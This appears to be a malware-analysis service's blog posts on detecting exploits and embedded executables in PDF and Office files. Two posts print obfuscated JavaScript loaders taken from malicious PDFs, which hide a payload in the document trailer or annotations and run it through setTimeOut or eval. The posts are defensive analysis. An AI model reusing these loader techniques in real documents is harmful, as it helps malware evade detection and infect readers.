View detection hits as hexdump on ViCheck.ca

For recently analyzed reports, we've added a Beta Analysis Report linked to from the regular report page, you can view hex humps of the exploits or embedded executables:

Detect JavaScript exploits in PDF, or embedded executables in MS Office exploits in .doc, xls, ppt files on ViCheck.ca.

More fun with PDF Obfuscation

Another interesting way to hide a block of JavaScript inside a PDF, info.Trailer:

exmu='dmw';if(app.alert)exmu='';WmMw=this;zisc=WmMw.info;exmu=exmu+unescape('%')+exmu;y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);app.setTimeOut(unescape(y1vw),3)

Shellcode Detection Tool

New web tool - paste your hex right from a hex editor into the Decoder Tool and select Detect as shellcode to run a LibEmu detection scan. Also decode various JavaScript obfuscation methods such as charFromCode, unicode, regular hex escaping.

Executable extraction from documents

New feature in beta, extraction of the EXE files and embedded documents. Check the bottom of the report page for a list of embedded files. The MD5's may vary from actual dropped files as any whitespace at the end of the exe's won't be included.

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. The use of getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed obfuscated JavaScript with some recent exploit.

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;

Our new blog

Welcome to the ViCheck blog, we're hoping to use this forum for updates on the malware analysis scene. Current trends are showing a rise in document format malware, viruses embedded in Adobe PDF or MS Office documents are difficult to detect. Our malware analysis engine at ViCheck.ca can detect current PDF exploits (media.newPlayer being the current favorite), as well as executables embedded in documents.

Yesterday's Google blog post has again highlighted the risks of PDF based malware against private corporations, government, and human rights groups. To reduce the risk from this type of malware, Javscript can be disabled in Acrobat Reader.

Recent ViCheck analysis reports of malware, including PDF viruses can be accessed from our website.